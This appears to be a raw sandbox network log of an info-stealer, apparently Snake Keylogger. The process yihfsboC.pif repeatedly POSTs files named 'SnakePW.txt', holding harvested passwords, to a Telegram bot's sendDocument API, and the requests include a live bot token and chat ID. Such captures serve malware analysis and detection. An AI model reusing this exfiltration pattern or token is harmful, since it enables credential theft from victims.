                                                                                                                2024-11-26 07:26:05 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388944,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605965,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                55192.168.2.749920149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:06 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f35250cf7bb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:06 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 33 35 32 35 30 63 66 37 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f35250cf7bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:07 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:07 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:07 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388947,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605967,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                56192.168.2.749921149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:06 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fc80cbc88b2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:06 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 63 38 30 63 62 63 38 38 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fc80cbc88b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:07 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:07 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:07 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388949,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605967,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                57192.168.2.749922149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:06 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f440fe0220d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:06 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 34 34 30 66 65 30 32 32 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f440fe0220dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:07 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:07 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:07 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388950,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605967,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                58192.168.2.749927149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:08 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f4ce99ede20
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:08 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 34 63 65 39 39 65 64 65 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f4ce99ede20Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:09 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:09 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:09 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388954,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605969,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                59192.168.2.749930149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:08 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f5908777d5b
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:08 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 35 39 30 38 37 37 37 64 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f5908777d5bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:09 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:09 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:09 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388956,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605969,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                60192.168.2.749928149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:08 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fe461bde220
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:08 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 65 34 36 31 62 64 65 32 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fe461bde220Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:09 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:09 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:09 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388957,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605969,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                61192.168.2.749933149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:10 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f63476ff6d9
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:10 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 36 33 34 37 36 66 66 36 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f63476ff6d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:11 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:11 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
